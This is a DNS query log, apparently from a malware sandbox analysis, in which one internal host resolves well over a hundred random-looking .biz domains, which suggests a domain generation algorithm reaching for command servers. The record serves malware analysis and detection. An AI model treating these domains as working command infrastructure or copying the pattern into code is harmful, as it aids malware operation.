                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:21.487046957 CET192.168.2.81.1.1.10x359cStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.329443932 CET192.168.2.81.1.1.10x33f0Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:22.487864971 CET192.168.2.81.1.1.10xc60aStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.358624935 CET192.168.2.81.1.1.10xb03cStandard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.786757946 CET192.168.2.81.1.1.10x4a9cStandard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.275650024 CET192.168.2.81.1.1.10x3e3dStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.284018993 CET192.168.2.81.1.1.10x4d9Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.276225090 CET192.168.2.81.1.1.10x4199Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.963239908 CET192.168.2.81.1.1.10x7f00Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.120903015 CET192.168.2.81.1.1.10x6ffdStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.647969961 CET192.168.2.81.1.1.10xd7cbStandard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.974940062 CET192.168.2.81.1.1.10xb5aaStandard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.114878893 CET192.168.2.81.1.1.10xc9f9Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.632378101 CET192.168.2.81.1.1.10x3ec7Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.797399998 CET192.168.2.81.1.1.10x4b1cStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.511996031 CET192.168.2.81.1.1.10x9b1bStandard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.600322008 CET192.168.2.81.1.1.10x9020Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.090923071 CET192.168.2.81.1.1.10x5fdStandard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.224944115 CET192.168.2.81.1.1.10x4a45Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.945012093 CET192.168.2.81.1.1.10x356bStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.242156029 CET192.168.2.81.1.1.10xb6d8Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.065936089 CET192.168.2.81.1.1.10x855fStandard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.402904034 CET192.168.2.81.1.1.10x2585Standard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.301482916 CET192.168.2.81.1.1.10x3b7cStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:34.330378056 CET192.168.2.81.1.1.10x2895Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.199665070 CET192.168.2.81.1.1.10x60a7Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:35.345973015 CET192.168.2.81.1.1.10xe98aStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.081561089 CET192.168.2.81.1.1.10xee65Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.645561934 CET192.168.2.81.1.1.10xb4c8Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.944056988 CET192.168.2.81.1.1.10x7ac1Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:36.951494932 CET192.168.2.81.1.1.10xf4dbStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.753448963 CET192.168.2.81.1.1.10xd7aaStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:37.813314915 CET192.168.2.81.1.1.10x95f8Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.173361063 CET192.168.2.81.1.1.10xe7e5Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:39.418461084 CET192.168.2.81.1.1.10x51c9Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.053200006 CET192.168.2.81.1.1.10xf758Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:40.921578884 CET192.168.2.81.1.1.10x82e9Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.117820024 CET192.168.2.81.1.1.10xae98Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.776889086 CET192.168.2.81.1.1.10x5a19Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:41.836184025 CET192.168.2.81.1.1.10x9249Standard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.639446020 CET192.168.2.81.1.1.10x4641Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.890599966 CET192.168.2.81.1.1.10xfcc3Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.939052105 CET192.168.2.81.1.1.10xa1a7Standard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.324903965 CET192.168.2.81.1.1.10x2748Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.363066912 CET192.168.2.81.1.1.10x8aeaStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.476851940 CET192.168.2.81.1.1.10x324Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.043606997 CET192.168.2.81.1.1.10xd235Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.199430943 CET192.168.2.81.1.1.10xbf70Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.737610102 CET192.168.2.81.1.1.10x58e5Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.496454954 CET192.168.2.81.1.1.10xe05bStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.580776930 CET192.168.2.81.1.1.10xa43bStandard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.284749985 CET192.168.2.81.1.1.10x80d3Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.648771048 CET192.168.2.81.1.1.10xca19Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.155620098 CET192.168.2.81.1.1.10xc009Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.841082096 CET192.168.2.81.1.1.10x674eStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.316668987 CET192.168.2.81.1.1.10xd19dStandard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.702048063 CET192.168.2.81.1.1.10x446eStandard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.573610067 CET192.168.2.81.1.1.10xf11aStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.945905924 CET192.168.2.81.1.1.10x7d41Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.971286058 CET192.168.2.81.1.1.10x7d41Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.487341881 CET192.168.2.81.1.1.10x727fStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.826889992 CET192.168.2.81.1.1.10x7adeStandard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.510447025 CET192.168.2.81.1.1.10x8dStandard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.940803051 CET192.168.2.81.1.1.10x59adStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.795550108 CET192.168.2.81.1.1.10x411Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.958167076 CET192.168.2.81.1.1.10xc005Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.505583048 CET192.168.2.81.1.1.10x5117Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.887681961 CET192.168.2.81.1.1.10x1773Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.609889030 CET192.168.2.81.1.1.10x508bStandard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867886066 CET192.168.2.81.1.1.10xf395Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.877352953 CET192.168.2.81.1.1.10x3f2eStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.074178934 CET192.168.2.81.1.1.10x8e5eStandard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.321258068 CET192.168.2.81.1.1.10x7234Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.329355955 CET192.168.2.81.1.1.10xdeb4Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.337899923 CET192.168.2.81.1.1.10x60b2Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.161936998 CET192.168.2.81.1.1.10x778eStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.651695967 CET192.168.2.81.1.1.10x3a4bStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.058512926 CET192.168.2.81.1.1.10x575cStandard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.922403097 CET192.168.2.81.1.1.10x4790Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.618814945 CET192.168.2.81.1.1.10x303aStandard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.521538019 CET192.168.2.81.1.1.10x7d74Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.569550037 CET192.168.2.81.1.1.10x7d74Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.570326090 CET192.168.2.81.1.1.10x281aStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.599029064 CET192.168.2.81.1.1.10x281aStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:08.075764894 CET192.168.2.81.1.1.10xae11Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:08.764581919 CET192.168.2.81.1.1.10xd265Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:08.783685923 CET192.168.2.81.1.1.10xd265Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:10.393172026 CET192.168.2.81.1.1.10x57d3Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:12.058692932 CET192.168.2.81.1.1.10xe74Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:12.917701960 CET192.168.2.81.1.1.10x3568Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.797549963 CET192.168.2.81.1.1.10x1760Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.814912081 CET192.168.2.81.1.1.10x1760Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.327754974 CET192.168.2.81.1.1.10x9234Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.450589895 CET192.168.2.81.1.1.10x1d4eStandard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.316668987 CET192.168.2.81.1.1.10x769Standard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.999447107 CET192.168.2.81.1.1.10xb42eStandard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.686850071 CET192.168.2.81.1.1.10x40baStandard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.890088081 CET192.168.2.81.1.1.10x22ecStandard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:19.885596037 CET192.168.2.81.1.1.10xda1aStandard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:20.749533892 CET192.168.2.81.1.1.10x7b1eStandard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:21.431845903 CET192.168.2.81.1.1.10x2a2dStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:22.279710054 CET192.168.2.81.1.1.10xdfe2Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.158626080 CET192.168.2.81.1.1.10x9b5bStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.020437002 CET192.168.2.81.1.1.10xf7e7Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.485054970 CET192.168.2.81.1.1.10x5300Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.329550028 CET192.168.2.81.1.1.10xac91Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.017206907 CET192.168.2.81.1.1.10xd350Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.890141010 CET192.168.2.81.1.1.10xbe73Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.901947021 CET192.168.2.81.1.1.10xef21Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.371723890 CET192.168.2.81.1.1.10x3c0dStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.379741907 CET192.168.2.81.1.1.10x5ca2Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.391716003 CET192.168.2.81.1.1.10xe586Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:32.344156981 CET192.168.2.81.1.1.10x748fStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:33.828330994 CET192.168.2.81.1.1.10xada9Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.206325054 CET192.168.2.81.1.1.10x445dStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.287723064 CET192.168.2.81.1.1.10x9440Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.984488010 CET192.168.2.81.1.1.10x2c72Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.432199955 CET192.168.2.81.1.1.10xf134Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.805805922 CET192.168.2.81.1.1.10x46daStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.813663960 CET192.168.2.81.1.1.10x7288Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.507563114 CET192.168.2.81.1.1.10x4c03Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.697293997 CET192.168.2.81.1.1.10xd654Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.153661013 CET192.168.2.81.1.1.10xebffStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.175275087 CET192.168.2.81.1.1.10xebffStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.013878107 CET192.168.2.81.1.1.10x8a43Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.215331078 CET192.168.2.81.1.1.10x9d1cStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.081593037 CET192.168.2.81.1.1.10xa9Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.762034893 CET192.168.2.81.1.1.10x45fStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.667279959 CET192.168.2.81.1.1.10x2acStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698772907 CET192.168.2.81.1.1.10x4e16Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.529159069 CET192.168.2.81.1.1.10xd6d5Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.185100079 CET192.168.2.81.1.1.10x3361Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.351147890 CET192.168.2.81.1.1.10x3c7eStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.377450943 CET192.168.2.81.1.1.10x3c7eStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.290489912 CET192.168.2.81.1.1.10x701eStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.633656025 CET192.168.2.81.1.1.10x56b2Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.139195919 CET192.168.2.81.1.1.10xf80Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.890988111 CET192.168.2.81.1.1.10xe1e8Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.579372883 CET192.168.2.81.1.1.10x944bStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.262933969 CET192.168.2.81.1.1.10x2075Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.349551916 CET192.168.2.81.1.1.10x7e11Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.945874929 CET192.168.2.81.1.1.10x7469Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.716589928 CET192.168.2.81.1.1.10xddd8Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.404062986 CET192.168.2.81.1.1.10x1b81Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.412244081 CET192.168.2.81.1.1.10x5de5Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.208795071 CET192.168.2.81.1.1.10x4930Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.258645058 CET192.168.2.81.1.1.10x986eStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.934010029 CET192.168.2.81.1.1.10xff4dStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.955621004 CET192.168.2.81.1.1.10xff4dStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.936430931 CET192.168.2.81.1.1.10xc6a7Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.577095985 CET192.168.2.81.1.1.10x9ee3Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.733731031 CET192.168.2.81.1.1.10x8a50Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.047586918 CET192.168.2.81.1.1.10xbcc9Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.685167074 CET192.168.2.81.1.1.10xb900Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.909759998 CET192.168.2.81.1.1.10xa95bStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
